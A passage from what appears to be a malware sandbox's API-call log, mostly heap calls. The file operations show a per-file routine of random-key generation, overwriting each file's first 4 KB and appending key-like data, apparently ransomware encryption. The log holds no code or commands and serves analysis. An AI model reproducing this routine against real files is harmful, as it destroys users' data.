lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.514] GetProcessHeap () returned 0x4f10000 [0082.514] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.514] SetFilePointerEx (in: hFile=0x8cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.515] WriteFile (in: hFile=0x8cc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.515] WriteFile (in: hFile=0x8cc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.515] GetProcessHeap () returned 0x4f10000 [0082.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.515] GetProcessHeap () returned 0x4f10000 [0082.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.515] GetProcessHeap () returned 0x4f10000 [0082.515] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.515] CloseHandle (hObject=0x8cc) returned 1 [0082.516] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 84 [0082.516] SetFilePointerEx (in: hFile=0x8d0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.516] ReadFile (in: hFile=0x8d0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.516] SetFilePointerEx (in: hFile=0x8d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.516] GetProcessHeap () returned 0x4f10000 [0082.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.516] GetProcessHeap () returned 0x4f10000 [0082.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.516] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.516] GetProcessHeap () returned 0x4f10000 [0082.516] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.516] ReadFile (in: hFile=0x8d0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.575] SetFilePointerEx (in: hFile=0x8d0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.575] WriteFile (in: hFile=0x8d0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.575] GetProcessHeap () returned 0x4f10000 [0082.575] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.575] GetProcessHeap () returned 0x4f10000 [0082.575] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.575] GetProcessHeap () returned 0x4f10000 [0082.575] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.576] GetProcessHeap () returned 0x4f10000 [0082.576] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.577] GetProcessHeap () returned 0x4f10000 [0082.577] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.578] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.578] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.579] GetProcessHeap () returned 0x4f10000 [0082.579] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.580] SetFilePointerEx (in: hFile=0x8d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.580] WriteFile (in: hFile=0x8d0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.580] WriteFile (in: hFile=0x8d0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.580] GetProcessHeap () returned 0x4f10000 [0082.580] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.580] CloseHandle (hObject=0x8d0) returned 1 [0082.581] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 85 [0082.581] SetFilePointerEx (in: hFile=0x8d4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.581] ReadFile (in: hFile=0x8d4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.581] SetFilePointerEx (in: hFile=0x8d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.581] GetProcessHeap () returned 0x4f10000 [0082.581] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.581] GetProcessHeap () returned 0x4f10000 [0082.581] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.581] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.581] GetProcessHeap () returned 0x4f10000 [0082.582] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.582] ReadFile (in: hFile=0x8d4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.629] SetFilePointerEx (in: hFile=0x8d4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.629] WriteFile (in: hFile=0x8d4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.629] GetProcessHeap () returned 0x4f10000 [0082.629] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.630] GetProcessHeap () returned 0x4f10000 [0082.630] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.631] GetProcessHeap () returned 0x4f10000 [0082.631] HeapFree (in: hHeap=0x4f10000, 